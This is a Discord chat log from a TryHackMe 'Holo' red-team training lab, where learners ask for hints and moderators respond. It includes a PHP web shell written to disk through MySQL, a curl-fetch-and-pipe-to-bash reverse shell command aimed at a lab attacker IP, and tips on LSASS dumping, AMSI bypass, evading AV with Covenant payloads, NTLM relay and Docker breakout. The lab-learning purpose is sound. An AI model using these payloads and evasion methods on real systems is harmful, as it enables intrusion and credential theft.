#holo-network

1 messages · Page 6 of 1

wind bobcat
#

well, svchost is just Windows' mechanism for running services

#

you can use techniques like process hollowing that start svchost, you halt the process, overwrite the process data with revshellcode and start the process again and you've got yourself a reverse shell

bright osprey
#

i need some help in the task 18. i have created a table in the D########DB database. now do i have to inject that php - <?php $cmd=$_GET["cmd"];system($cmd);?> in the column of the table?

livid shoal
#

@wind bobcat Is someone supposed to remain joined inside the holo room and see everything and start networks 👀 even after his/her sub ends? No right??

wind bobcat
wind bobcat
livid shoal
# wind bobcat depends on how many days of access you have left

I was able to start the network somehow even though i couldnt access the holo room page anymore. I sent that bug report to support email and they say that Once you have joined Holo/ Wreath, you are indefinitely allowed to rejoin the room, whether you lose your streak or subscription :) which i dont think is true is it?

#

or maybe i misunderstood something?

bright osprey
fossil bane
#

Then there is a specific command to call that file... call url if you will...

dapper idol
#

curl is a good friend

verbal bramble
#

wfuzz -c -b PHPSESSID=37jlf98alaak211660ga2j1lln -u http://admin.holo.live/dashboard.php?FUZZ=whoami -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt

This command for task 13 gives me a lot of outputs that are of response code 200 , How do i narrow it down to what i want ?

wind bobcat
#

see task details

verbal bramble
#

oh right my bad

#

Thanks @wind bobcat

hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

lone spruce
livid shoal
wind bobcat
#

it does seem like a bit of a business logic flaw to me, but THM has their reasons for what they do. I wouldn't question it, just enjoy the free-forever access

livid shoal
wind bobcat
#

hhHdsdfsd

livid shoal
#

with some api stuff, i got the machine running 👀

wind bobcat
#

see what those two have to say

livid shoal
#

totally confused rn

outer junco
livid shoal
outer junco
livid shoal
hollow steepleBOT
#

Gave +1 Rep to @outer junco

tardy idol
#

I need a network reset plz

wind bobcat
reef niche
#

probably holo

wind bobcat
reef niche
#

ah

#

my brain didn't think about there being multiple lol

tardy idol
#

or do you need mine?

wind bobcat
#

and now you have to wait for people in that subnet to see it :d

night widget
#

i'm having trouble getting covenant to work on s-srv01

low tree
#

Same here, when i try to run the "grunt.exe" payload got no response back. When i try to run the payload with my virtual machine got the following exception
"Illegal characters in path."
After some research looks like it's due to a ssl certificate or something like that, i'm not really sure. If anyone already faced this issue with Covenant it's would be nice if he/she tells us what i can do to fix that.
Additional Information :
->Already tried with other launcher (Powershell) same issue "Illegal characters in path"
->Listerner option "UseSSL" set to false
->Covenant running as sudo and login with an admin account
->Tried to upload launchers with "ValidateCert" and "UseCertPinning" set as "true" first and then as "false" got the same error

gleaming eagle
#

about to restore my subscription, does holo use covenant like wreath used psempire?

#

I know you can use any framework to do it but was curious if its similar in the way it guides

#

or is it more of a blackbox type of deal

lone spruce
#

Similar

tardy idol
#

is anyone else getting a www-data user again on the same docker container on task 19

wind bobcat
tardy idol
#

PEBCAK very funny. Just want to know if anyone has meet the same problem. I don't want the answer.

tardy idol
wind bobcat
#

lets put it this way -- you're trying to pivot off of the container, there's a section about port scanning with limited resources and accessing MySQL Databases

tardy idol
#

Got it with a different method. Command suggested didn't work for me

glossy timber
lone spruce
#

It’s specified in the task

tardy idol
bold pollen
#

Anyone know why my grunts don't get past stage0? Not really sure how to fix this

verbal bramble
#

I'm having trouble with transferring my payload on to linux machine (task 13) , can someone help me ?

woven lava
#

Did anyone use PssCaptureSnapshot on S-SRV01?

dapper idol
#

Nope not me

gloomy ravine
#

Can we use the application from the internet for dll hijacking. Or only the one present in vm.

livid shoal
#

you can spin up a file server 👀

gloomy ravine
woven lava
# lone spruce Why?

I'm trying to be extra sneaky on the LSASS dump. I've got a nice exploit in Cpp but can't compile it with mingw and my broke PC can't run a win10 VM

#

I'm really trying to bag those sneaky points on the report 😆

#

Trying to completely avoid anything on the disk

#

So I was just curious is anybody used that to create a memory dump

gloomy ravine
#

I can't replace the dll file as i Don't have permission to.

#

How can i continue any hints?

lone spruce
#

if youre replacing anything youre doing it wrong

gloomy ravine
#

ohh

#

can i get a reset 10.200.139.x

woven lava
#

You get a reset every hour ig

gloomy ravine
woven lava
#

Guess so

gloomy ravine
#

ok

woven lava
#

Btw is using reg save "Loud"?

#

Anyway I can get LSASS dump without writing to disk?

wind bobcat
#

let me go load falcon

#

place it on an smb share

lone spruce
#

I mean. If youre editing the registry I would say so

#

Sysmon will pick that up very quickly

woven lava
#

White listing a directory with Powershell is also "Loud"

#

Thus I asked if anyone has used PssCaptureSnapshot

#

It's supposed to be sneaky

#

Really trying to bag those style points vent

bold pollen
#

Anyone able to help with getting a grunt on covenant? I can't get my grunt to progress past stage0

livid shoal
woven lava
#

Looks cool.

livid shoal
#

I saved this earlier lol

woven lava
#

Btw, can't you still access networks after your sub expires?

livid shoal
livid shoal
#

😦

lone spruce
#

did you test the grunt?

bold pollen
#

I don't get any errors with threatcheck anymore so I think I have

#

I ran the grunt on my windows VM and I got a connection back but that also got stuck at stage0

lone spruce
#

then you have yet to fully clean it

#

just because Treatcheck says its clean doesnt mean it is

woven lava
#

@lone spruce another stupid question: are you looking for the entire explanation of the DLL hijack or just a one liner would do tuxcooctus

lone spruce
#

Its your report

#

We want to see what you can do

#

Not what we can do regurgitated through you

bold pollen
#

Any chance you could provide a hint on what I've missed? I've gone back over the THM room and redone the steps but I have the same problem so I must have missed the same thing

woven lava
lone spruce
#

best thing would be to reference multiple articles, etc. Versions, mitigations, CVE if applicable, etc.

woven lava
#

Aah sweet. Thanks man. That'll do :D

lone spruce
#

Should also include full path of vulnerable DLL, etc

woven lava
#

Yeah I'll be verbose with that :D

lone spruce
#

@wind bobcat I guess the one thing we didn’t specify was audience. I think audience is important to the language and information of a report

#

I think for this more verbose and technical is better since the audience is us

wind bobcat
#

you can always edit the task

#

no one's submitted a report yet, so

lone spruce
#

Kek

bold pollen
#

I guess I'll give up for now and come back to it later, been at this one task for 9 hours now 😂

woven lava
#

Btw, by "being verbose" do you mean adding all scan results and stuff or will the key pieces of information do like a list of open ports and stuff(besides mentioning the obvious like tools used, wordlists, etc)

*And linking relevant topics, artciles, repos

bold pollen
#

Any hints or nudges in the right direction on what I'm missing would be greatly appreciated

woven lava
#

Where are you stuck?

wind bobcat
#

not so much wordlists, scans, etc.

lone spruce
woven lava
hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

woven lava
#

Really appreciate all the help

wind bobcat
#

if you (for example) are looking for hosts with something specific for the purpose of lateral movement, include that

#

assuming you weren't give a subnet and or any device info

#

and you wanted to find a domain controller, you'd scan for porta 88,389,636

olive path
#

Good evening,

Can someone dm to talk about the task 'Post Exploitation Watson left her locker open' ? I am really hard stuck.

woven lava
#

Yes, that's what I've been doing.

#

Thanks for the pointers @wind bobcat :D

#

This really puts things into perspective

wind bobcat
#

side note; presentation is going to account for a ton

#

if you have a gorgeous looking report that's mediocre, you'll score better than someone who has a perfect writeup written in notepad

bold pollen
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

lone spruce
woven lava
#

Plus Pandoc exists

olive path
lone spruce
#

that’s not bypassing applocker that is just accessing the device

#

you’re dumping hashes, passing the hash to get access, then using directory permissions to bypass applocker

low tree
# bold pollen I'll reread them now. I must have missed something when I read them the first ti...

if you find something it's would be nice if you tell what wrong 🙏 , i have the same issue than you cannot get the Grunt initiated even if TheatCheck tell's me that everything it's ok. 2 days now that i'm stuck in this task, tried multiple configuration with listener thinking that i did something wrong, tried with the Powershell and then the binary launcher, looked at different sources but nothing worked, so i dont really know what i did wrong 🤷 .
When i run the amsibypass with a wrapper the server response me with a "true" so i suppose that the amsi has been bypassed, when i run the payload with a wrapper got no response back from the server the grunt refuse to start. i tried to merge the amsibypass and a powershell launcher in one unique ".ps1" file and execute it with a wrapper the server response again with true but no grunt launched so dont really know. 🤷

lone spruce
#

read the articles

#

and don’t just half read them and assume you’re done

#

Actually read them

#

it’s literally spelled out for you directly in the articles all you have to do is copy it correctly

gloomy ravine
#

how you guys rebooted the vm?
I used shutdown /r

#

But still smb is open

dire ferry
#

Someone broke one of the subdomains of L-SRV01 and i cant reset..

lone spruce
#

What do you mean by broken

#

And you get one reset token an hour

dire ferry
#

i can't access it.

gloomy ravine
#

Stopped all the services as given

dire ferry
#

Error

Timeout in communication with remote server

#

only for 1 subdomain , the other 2 are working

#

the one not working was working a few hours ago

olive path
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

river cradle
#

@dire ferry try clearing cookies for that subdomain or going through incognito. Should work then

#

At least if that's the one I'm thinking of, the one that likes to not work if you have a session

hollow steepleBOT
#

Gave +1 Rep to @river cradle

olive path
#

Btw, right now I am stuck finding the app vulnerable to dll hijacking. Using PowerUp, winpeas, seatbelt, wcmic and other tools. These are the only apps that I have found so far. Am i missing something?

Amazon SSM Agent
aws-cfn-bootstrap
AWS Tools for Windows
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.27.29112 
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.27.29112
AWS PV Drivers
Wireshark
npcap
lone spruce
#

You’re trying too hard

#

do some manual enumeration of the file system

lone spruce
lone spruce
#

@wind bobcat here you go babes. I’m busy rn 😘

woven lava
#

Btw, any ideas why I can't I scan any of the internal networks?

#

Like the DC/Fileserver and all that?

lone spruce
#

What do you mean by not scan

woven lava
#

I'm sorry I didn't phrase it right

#

My nmap scans return all ports as closed

#

I have sshuttle port forward enabled

#

I can access the services

#

But nmap returns nothing

#

I ran nc -zv IP and it's returning all ports as open

#

I used the standard flags sudo nmap -A -T4 -n3 -Pn -oN Scan.res IP

lone spruce
#

Because sshuttle isn’t designed to port scan

woven lava
#

Anyway I can tunnel my request through it?

#

I transferred a nmap static binary over to the server but that's just painful

lone spruce
#

Static nmap or chisel

woven lava
#

Aah thanks man

olive path
olive path
lone spruce
olive path
lone spruce
#

RDP still has nothing to do with Task 38

#

That still falls under Task 37 you’re just doing it a different way

woven lava
#

Sshtunnel is shit. I ended up using an ssh proxy

silent mesa
#

what's the problem on my scan? i used nmap -sV -sC -p- -v 10.200.x.0/24 --min-rate 5000,change the x using my subnet. Still got all host down

wind bobcat
#

you're sending out 5,000 packets per second

#

that's a pretty large amount

silent mesa
wind bobcat
#

i wouldn't specify a value

#

i wouldn't even have the min rate flag

lone spruce
#

Whaaaaa

#

Spooky tells lies

#

Min rate only rate

silent mesa
#

i still can't find the host

#

should i reset the network?

lone spruce
#

Did you slow down the scan?

silent mesa
#

yes, i slow down the scan to 1000

quiet raft
gloomy ravine
lone spruce
#

I dunno

#

I can’t help you by the only information given is: SMB open, it’s not working

gloomy ravine
#

i was doing the ntlm relaying

#

in task 47

#

i stopped the services and rebooted the machine as written in the blog by spookysec

#

im not reciveing smb connection after running ntlmrelay

#

stuck on this stage

#

@wind bobcat

lone spruce
#

Did you tunnel your traffic?

#

The SMB server doesn’t just reach out to you after you stop it. You have to control it

maiden briar
#

Anybody having connectivity issues to external web server atm?

gloomy ravine
zenith delta
#

i am now

lone spruce
gloomy ravine
#

Now im getting these errors

lone spruce
#

Seems fine your just getting a lot of requests

#

The relay should be there

gloomy ravine
#

psexec aborting the connection

#

ok

#

smbexec worked

#

pesexec was having problem

gloomy ravine
#

Thank you. Amazing room.

livid shoal
#

wohoo

#

congrats

#

🥳

silent mesa
fossil bane
#

I'm at task 28. Have two usernames, three passwords... none work. Always get an empty page when trying to log in, even with random user and pass... Some hint to point me in the right direction?

#

Should I re-check the two machines and see if there are more creds lurking somewhere maybe?

olive path
#

@lone spruce thanks for the nudge looking for the file system. I have almost finished the network and I was wondering what is the purpose of the machine S-SRV02.

hollow steepleBOT
#

Gave +1 Rep to @lone spruce

olive path
livid shoal
dapper idol
#

Warning: move_uploaded_file(C:\web\tmp\phpB903.tmp): failed to open stream: Invalid argument in C:\web\htdocs\upload.php on line 31

Warning: move_uploaded_file(): Unable to move 'C:\web\tmp\phpB903.tmp' to 'C:/web/htdocs/images/rv.shell.php' in C:\web\htdocs\upload.php on line 31
Sorry, there was an error uploading your file.

#

Is it due to the anti virus or just a bad bypass?

#

Task 29

olive path
dapper idol
#

ty

lone spruce
velvet fossil
#

task 28 isnt working for me... I am accessing the website using socks5 proxy and when i try to reset password it says "email has been sent" but i dont see any reset token in developer (firefox) ??

#

the user im trying to reset is the one who was found in creds.txt

wind bobcat
#

the user starts with g, right?

velvet fossil
#

Ya

#

@wind bobcat

livid shoal
#

there is a token

#

there

wind bobcat
#

have you tried using a different browser? You might be missing it. Firefox likes to hide the cookies tab, it's much easier to find on chromium

livid shoal
#

cookies

velvet fossil
#

Ok so the url on the request has user and then token= but the leak is there ?

wind bobcat
#

the leaked token is in the cookies, yes

zenith delta
#

is there an alpine image on the box, or am I supposed to build one and send it over?

wind bobcat
zenith delta
hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

bold pollen
#

Anyone able to provide a sanity check on using evil-winrm through proxychains? I could've sworn I had the right hash but I get an authentication error

lone spruce
#

Evil win rm wack use rdp

#

It just decides it doesn’t feel like working some days

bold pollen
#

That worked, thanks

modest cosmos
#

Just want to give some feedback. People should be told to use less threads (not even the mentioned 30-40). Because it is very annoying - I lose connectivity every 3 minutes, need to get back reverse shell and loosing connection again.
That's very sad, hopefully I will find a time slot, when not everyone is fuzzing.......

dapper idol
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

livid shoal
modest cosmos
modest cosmos
#

.69

livid shoal
modest cosmos
#

The thing about leaving and rejoining? Didn't work

#

Got reassigned to the same subnet

livid shoal
modest cosmos
# livid shoal oops

Thanks for your efforts and time, but I will take a break and do something else.
I have no more patience - have a nice weekend.

hollow steepleBOT
#

Gave +1 Rep to @livid shoal

wind bobcat
zenith delta
#

is the admin pass for the linux box in rockyou? it says it recommends rockyou to begin, I've ran it a few diffrent times so if it is, I'm messing up somehow

wind bobcat
# modest cosmos .69

And for what it's worth, the .69 subnet is broken. It was the former testers subnet that end users shouldn't be placed into it. There is also notes in Task 9 and 10.

outer junco
#

I'll increase this to 100

zenith delta
#

lol Im nin the 69 subnet, great

wind bobcat
#

but as you just said, you're in the subnet from hell, lel

outer junco
zenith delta
#

so I got stuck cracking the password and my subnet changed, I've been rehacking but my database seems to be offline. The admin page just hangs no matter the input. Anything that can be done other than waitng on resets?

#

I supose I can just wait until it turns off

lone spruce
#

what subnet are you on?

zenith delta
twin karma
#

hello, can anyone do a reset on holo network (subnet is 10.200.151.0)

wind bobcat
#

t5 scans are very quick. I wouldn't recommend it.

#

they can cause machine instability

timid coral
#

use rustscan if you want fast and stable

#

REALLY? Holo is a class B?!?!

#

I'm impressed. not relevant to your problem... so I'll shut up now

gloomy ravine
potent hound
#

Is this normal? When I try to run the vulnerable app task 43?

wind bobcat
#

you're not supposed to run the vulnerable app

#

if you did, who's level of privileges would that give you?

potent hound
#

Yeah I know

#

I should wait for the task

#

but nothing's happening

wind bobcat
#

if it's been over 30 minutes, I'd suggest pushing for a restart

#

if that doesn't fix the issue, ensure you're doing the dll hijack properly

wind bobcat
potent hound
#

ok thanks

lone spruce
woven lava
#

Hi People, so i'm still trying my super sneaky moves on Holo and was wondering if there are any "silent" ways to get to the DC other than the one described in the task?

lone spruce
#

Not really

#

Once you own a DC it’s done you’re over

#

you can talk about clean up and exfiltration, cleaning your traces, etc

zenith delta
#

Just came back and I'm unable to ping the network after starting it again

potent hound
#

Check the subnet, it might've changed

zenith delta
#

😦 it's still the same

potent hound
#

Did you connect to the holo vpn?

zenith delta
#

yeah

#

I was cracking the hashes on colab went to eat and came back and I can't ping

#

I've rebooted and reconnected

potent hound
#

what subnet are you in

zenith delta
#

10.200.175/xx

potent hound
#

what machine are you trying to ping?

zenith delta
#

L-SRV01

#

I'm not getting a DHCP lease either

potent hound
#

Maybe try to refresh the thm site and check if it's started

zenith delta
#

Been up for 21 minutes

#

I'll try regen a new config and try again

#

From 10.50.172.1 (10.50.172.1) icmp_seq=1 Destination Host Unreachable

potent hound
#

Try to killall openvpn

#

maybe you have multiple openvpn instances

zenith delta
#

I've tried that still Destination Host Unreachable

potent hound
#

Did you get the new vpn file?

zenith delta
#

yeah

potent hound
#

then just vote for reset

zenith delta
#

voted it's on 2/3

#

I also left and rejoined the room before regenerating config file

#

yeah it's the holo network spawned a different machine and ping was working

#

daym

wise raft
#

In the Pivoting section "Task 23" , it was said in an example that we can ping target machine using "proxychains ping <IP>", I'm not sure it works like that, you can't ping through a SOCKS proxy since it does not support the ICMP protocol. To my knowledge: A SOCKS proxy provides a TCP proxy service (SOCKS 5 added UDP Support). You cannot perform an ICMP Echo "via" a SOCKS proxy service. am I wrong ?

lone spruce
#

I don’t think SOCKS affects ICMP? @wind bobcat am I bugging out?

wind bobcat
#

yes

lone spruce
#

Well

#

my brain is thinking of sshuttle

#

I have no clue what was going on in my head when I wrote that and I am too tired to worry about that now. Sounds like a tomorrow spooky thing

#

@wind bobcat how long is finals?

wind bobcat
#

8 more hours?

devout crater
zenith delta
devout crater
zenith delta
#

well you havent

#

if u used the wordlist they suggest you'd have cracked it lol

devout crater
zenith delta
#

nah u can do it with what's provided just re read it

twin karma
#

i have a problem with my network on subnet 10.200.151.X, the network up time is about 10 minutes and all the machines are unreachable in all services

upper rock
#

For the docker breakout part, do you need to use port 53 or could you use say 54 instead?

lone spruce
#

I guess that was never really explained this time around

#

so

#

Port 53 is used because it’s obviously dns and looks nice with evasion shit

#

you can use any old port you want though

upper rock
#

Ok, and do I need to do anything else than what is written in task 18 and 19 to get a rev shell and break out from the docker container?

#

Because I've done that a few times and reset the network but it's not working for me

#

I use the provided curl command at the end of task 19 and replace the ip and the port which my python server is on from 80 to 8000 (in the command) but get nothing. And when I look at my python server it says that 10.200.107.33 has requested /shellscript.sh and it gave a 200 status code

lone spruce
#

did you change the encoded execution?

upper rock
#

in the command

#

should I re encoded it the correct values?

lone spruce
#

@wind bobcat

wind bobcat
#

bsuy

#

defcon, remember

lone spruce
#

I’m aware I’m busy too

#

defcon, remember

#

nematode

wind bobcat
#

you're not in rtv finals 😛

lone spruce
#

Im in workshops and meetings and shit

#

also you said 8 hours 12 hours ago

river cradle
spark plover
low tree
#

Still can't get any Grunt working on the target, i don't know what to do anymore i've been trying for days now 😩
I don't now how i can build a clean Grunt everything i try got me an "Illegal chars in path" when i try it in local and this even if i followed the RastaMouse blog so.
I think it's all about the sentence "Use your knowledge of HTTP requests and responses to break the signature." but actually i don't get how i can do this.
so any help will be welcome 😕

wind bobcat
#

so it's flagging on // Hello World! {0}

#

so you should remove that and change it to something else

#

for example, maybe an innocuous picture of a raccoon, or maybe a blog about how much you like cats

zenith delta
#

hey

#

someone can helpme getting root with docker in task 20

wind bobcat
#

if you haven't looked at GTFOBins, look at it. The command you need is there, you just need to alter the syntax slightly

zenith delta
#

i did it

#

i just dont see it

#

sudo install -m =xs $(which docker) . i have to execute docker exec then the command without the sudo

wind bobcat
#

you don't need to do that.

zenith delta
#

mmm

low tree
lone spruce
#

Change it to literally anything

#

you can go into the profile and there is a section to change the body to whatever you want

low tree
#

so the main point it's about removing the " // Hello world! {0}" tag? and no mather what i put in the profile body after that? can i even left it how it is? means removing the tag en leaving the rest

wind bobcat
#

Remove the tag, leave the rest, re-check and see if it still gets flagged

#

if it gets flagged, you know what it gets flagged on so you know what to change

#

generally, it's a better idea to change or add content, not so much remove it

zenith delta
#

hey i have a question im new in try hack me, why holo room says 3 day of acces? it will get removed?

wind bobcat
#

theres a finite number of networks, it's to ensure that theres enough networks for everyone that wants to join

#

if you want to re-up your access, leave and rejoin

pale steeple
#

its been loading for over 4 minutes

#

holy crap it loaded :D

upper rock
#

Hey! Could someone help me with breaking out of the docker container? I've followed every step that's in task 18 and 19, I've created the shell.php file in the DashboardDB database in mysql, I can curl it with commands such as whoami and get the www-data response. I've created a .sh file with the provided bash shell script and hosted it on a python webserver on port 8000, I changed it from port 53 to 54 also. I then took the unencoded curl command and adjusted it to be correct with my ip and port and url encoded it. This is the command I used: curl 'http://192.168.100.1:8080/shell.php?cmd=curl http%3A%2F%2F10.50.103.2%3A8000%2Fshellscript.sh|bash %26' and I excecuted it from the docker container (192.168.100.100). But when I run the command it nothing happens, if I look at the python webserver I see that 10.200.107.33 tried to get /shellscript.sh and it gave a 200 status code. But yet I didn't receive a connection on my nc listener. What could I be doing wrong?

pale steeple
#

can someone please assist me with getting a shell on the first machine?

#

I've tried several ways including php, python and bash

#

except none seem to work

#

I've used nc -lvp 1553 for the shells and python3 -m http.server 1553 for trying to download a php shell onto the website

vapid girder
#

@upper rock do not copy everything literally, some changes are needed

upper rock
#

Everything looks pretty correct to me

vapid girder
upper rock
#

I need to replace the tun0ip with my own ip, right?

vapid girder
#

pretty much 🙂

upper rock
#

🤦‍♂️

#

Thank you very much @vapid girder

hollow steepleBOT
#

Gave +1 Rep to @vapid girder

upper rock
#

I wrote a paragraph about the problem and all I missed was that I needed to replace it

#

Well, you learn something everyday :)

vapid girder
#

you are welcome, we all make mistakes, import is to learn from them 😉

#

@pale steeple you have command execution on the server so just get a revers shell - bash works, be aware of encoding

zenith delta
#

I'm on 22 and I'm unsure if Ive setup my port forward correctly

#

i'm using sshuttle and it gives me what I'd only assume are incorrect open ports

#

I can reach S-SRV01 which I couldn't w/o the forward

lone spruce
#

are you attempting to nmap with sshuttle? What do you mean incorrect open ports?

rose sparrow
#

Someone here has win the PEN-300 Voucher??

river cradle
#

the competition hasn't ended yet

lone spruce
#

Currently you have a 100% chance of winning it

lone spruce
#

you could literally submit me a picture of a bean and win

river cradle
#

what if two people sent that bean and noone else?

#

who'd win then

lone spruce
#

whoever sends me 69 lbs of beans first wins

river cradle
#

that will cost me less than an osep voucher

rugged leaf
#

I need a hint for task 31 where do they want to Put code, on a windows VMware with visual studio?

vapid girder
#

@rugged leaf windows wm, powershell window, task 31 talks about amsi bypass in powershell

rugged leaf
#

Ok but now on task 32 when I try to use tool all I get is ansi_result_detected

upper rock
#

If I've setup chisel correctly should I be able to ping 10.200.X.31 using ```txt
proxychains4 -f /etc/proxychains4.conf ping 10.200.X.31

river cradle
#

no, ping does not work through socks proxies

#

if it's a windows host you can often check (scan with nmap) ports 139/445 to see if you have set up the host correctly

upper rock
hollow steepleBOT
#

Gave +1 Rep to @river cradle

upper rock
#

or do I need to use the proxy through my browser to access it?

river cradle
#

if you're using a socks proxy then you need to set up the proxy in the browser too

#

you can set it up globally in the settings, or use an extension like foxyproxy to quickly switch between proxies + add rules for only certain sites (like this host) to be routed through that proxy

upper rock
#

perfect, thank you!

vapid girder
#

Nice network, congrats to the creators animewave

maiden briar
#

When is deadline for report?

foggy crest
maiden briar
#

okk tyty, I somewhat recall sept 15 but am having trouble finding it in da words. I also can't read lmao

#

Another question, though newer techniques are available for going through this network that are considered "noisy", would we be docked if we didn't test and report those possible issues?

wind bobcat
#

And no, this is a "red team assessment". Not a pentest.

#

you're not required to find all of the vulnerabilities within a network

lone spruce
#

Be sneky snake

maiden briar
#

ah, I c. tyty

keen prism
#

hey guys! I need your help - I am stuck at Task 13, spawning the reverse shell - none of them from the cheat sheet seems to work oO any help?

rough orchid
#

hey, anyone else have a problem with the docker privesc in task 20 giving errors?

rough orchid
olive path
olive path
livid shoal
olive path
#

thanks for the encouragement

livid shoal
livid shoal
#

@wind bobcat just out of interest, how many folks have submitted the report till now?

wind bobcat
#

0

livid shoal
maiden briar
#

Will we have access to the environment after the comp is over? It's super nice and id like to try more things on it as i learn more

wind bobcat
#

no its being deleted

#

yeah, it'll stay up as long as Skidy and Ashu wants it up

lone spruce
#

Spooky what the heck

#

you nematode

livid shoal
lone spruce
#

huh

#

@SL#6245

#

@chrome cave what?

chrome cave
#

@outer onyx

#

Discord Cache is weird

lone spruce
#

wacky

#

anyways. I dont respond to DMs please send your question here

woven lava
#

Draft report done. Time to make it pretty.blobheart

maiden briar
hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

livid shoal
#

I maybe the first to write a pentest report in html

#

with tailwind css lmao

woven lava
#

I used Pandoc and markdown

livid shoal
woven lava
#

Hopefully I'll get them by Tomorrow. It's been one hell of a week and am tired.

livid shoal
#

Whereas markdown and word kinda restricts

woven lava
#

But am just too noobish with css

wind bobcat
#

wat

woven lava
#

Also, a non native speaker, so there's that.

livid shoal
woven lava
livid shoal
woven lava
#

Aah. I'll stick to my markdown and hope the THM Gods like it xD

livid shoal
#

whatever suits you. completely your choice

#

@wind bobcat what do u use to write reports? markdown?

woven lava
#

How many reports have been submitted so far? 👉 👈

woven lava
#

Aah, atleast a second place.

wind bobcat
#

word

#

markdown is disgusting

woven lava
#

........

livid shoal
# wind bobcat word

yesss i prefer word too over markdown in documents atleast. Just wanted to try something new so thought of using html 👀

woven lava
#

I rather used markdown because it's prettier than doc

#

And neat

livid shoal
#

and its prettier

#

as well

woven lava
#

Too late :)

livid shoal
woven lava
livid shoal
#

thats word

woven lava
#

Would have sent a sneak peek but I don't wanna get disqualified

livid shoal
woven lava
#

Yeah I've seen this.

#

I bet Cry and Saupki would recognise my template in a jiffy

#

Hopefully, they like Cyan

livid shoal
woven lava
#

Yeah, it's Soothing

#

That's the main theme color

#

Fingers crossed 🤞🏼

#

How about an anime themed report with their favourites

livid shoal
woven lava
#

Good luck :D

#

Idk how this one would be. Am very anxious and tired.

wind bobcat
#

no anxious

#

no report submissions yet lmao

outer onyx
#

Hi i have a problem in the task 18

#
www-data@68198143b5cb:/var/www/admin$ mysql -h 192.168.100.1 -u admin -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 12
Server version: 8.0.22-0ubuntu0.20.04.2 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php';
ERROR 1086 (HY000): File '/var/www/html/shell.php' already exists
#

curl 192.168.100.1:8080/shell.php?cmd=whoami

#

And i don't have a feedback

#

I have tried to regenerated config ovpn, reset 3 times the network, kill all openvpn proccess, reboot my computer and always nothing

#

I have tried also a ping and revshell but nothing

lone spruce
#

you didn’t encode your conmand

outer onyx
#

my curl command ?

lone spruce
#

Yes

outer onyx
#

url encode ?

#

i don't understand why i must encode the command

wind bobcat
#

try renaming the file something else

lone spruce
wind bobcat
#

I see nothing wrong with the command

#

there's nothing to url encode

#

whoami should work.

#

the only reason I could think of that it might not possibly display the command results is because not all php shell exec commands display output

#

passthru does, I know that off the top of my head

lone spruce
#

@wind bobcat in the task it’s specified to encode the spaces and use http with it encoded. I dunno I didn’t write the task

wind bobcat
#

that's for the revshell callback nematode

lone spruce
#

Oh kekw

outer onyx
wind bobcat
#

try <?php passthru($_GET("cmd"));?>

maiden briar
#

Yo, guidance on finding the hijackable scheduled task? I've got a dll that will work, I just don't know any details about the task besides that there's a binary in a folder that is hijackable

wind bobcat
maiden briar
#

I think I've got that part down, as on a demo system my dll is loaded just fine

#

I'm just unsure of a good cli method to enumerate the scheduled task and its action

weak rapids
# outer onyx `curl 192.168.100.1:8080/shell.php?cmd=whoami`

happened with me a ton of times - i dont exactly remember what i did - but can u try to use the other IP or try to select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shellone.php; and then use the curl otherip:8080/shellone.php?cmd=whoami

weak rapids
rugged leaf
#

me i am stuck on the AMSI bypass

wind bobcat
maiden briar
#

ohhhhh danke

rugged leaf
#

when i run AmsiTrigger all i get Check Real Time protection is enabled

#

do i need to disable the av on the vm?

#

now all i got when i run the code from task 31 on AmsiTrigger is AMSI_RESULT_NOT_DETECTED

maiden briar
wind bobcat
#

we don't care, it's a guided network

maiden briar
#

Coolio, I've got my DLL named to kavremoverENU.dll and in the C:\users\watamet\applications folder.

My dll runs shellcode using createthread on DLL attach, this seems to be working as intended on stuff like notepad, etc.

When running locally on a demo machine, and even in environment, I can't get my dll loaded into kavremover.exe, not even with process hacker. Any ideas why?

#

Do I have to ditch dll attach? sign the dll? create an export of the functions utilized in the binary and make that my shellcode runner?

lone spruce
#

it shouldn’t be in the applications folder

#

it should be in the folder of the DLL it is expecting

maiden briar
#

ah ok tyty
Also, maybe im just bad at coding too. msfvenom stuff works just fine, custom loader does not

#

oh welp

#

What's the trigger period on it?

#

just to clarify, even though we have access to the room for a set number of days, reports can be submitted on the 15th of sept?

wind bobcat
#

likely 5-10 minutes

#

the report can be submitted whenever

maiden briar
#

pog danke

wind bobcat
#

if your report isn't finished right now you have a 100% chance of winning

#

like, honestly, you could submit a blank text document that says "report" and you'd currently have the best odds 💀

maiden briar
#

Noice haha, I have to remove stuff bc I was reporting a bunch of vulns that didn't help too much
tyty for the response

weak rapids
#

wish i could submit it 😂 only if i had access to the network 😛

maiden briar
#

You can just email it right?

livid shoal
maiden briar
#

or wait you mean you didnt get enough screenshots

livid shoal
maiden briar
#

Pain.

#

lolol, bite the bullet, spend 10 dollars, and get access to the room and gather screenshots from where you left off with a new acct

#

this is satire

wind bobcat
weak rapids
#

which email do we even mail?

wind bobcat
#

the one outlined in the task, nematode

weak rapids
#

i think i have previous notes for first 4 5 tasks

weak rapids
livid shoal
#

:)

weak rapids
livid shoal
#

@wind bobcat whats this website btw? I mean it leads to some kind of blog lol

wind bobcat
#

well, get access nematode

weak rapids
#

do i use some kind of template?

livid shoal
weak rapids
#

reeeeeeeeeee

wind bobcat
#

was going to do more with it ^^^^^ didn't have the time

livid shoal
#

ah

weak rapids
#

i would just put a nmap scan in there and submit report..thats all i have

livid shoal
#

:(

weak rapids
#

i have the soft release notes

#

did u change anything after that?

wind bobcat
#

yes kekw

weak rapids
#

like after 15 july

livid shoal
weak rapids
#

reeeeeeeeee

livid shoal
#

if i had known that earlier, i would have been made it along with it sed lyf

weak rapids
#

i wouldnt have made it then as wlel kekw

#

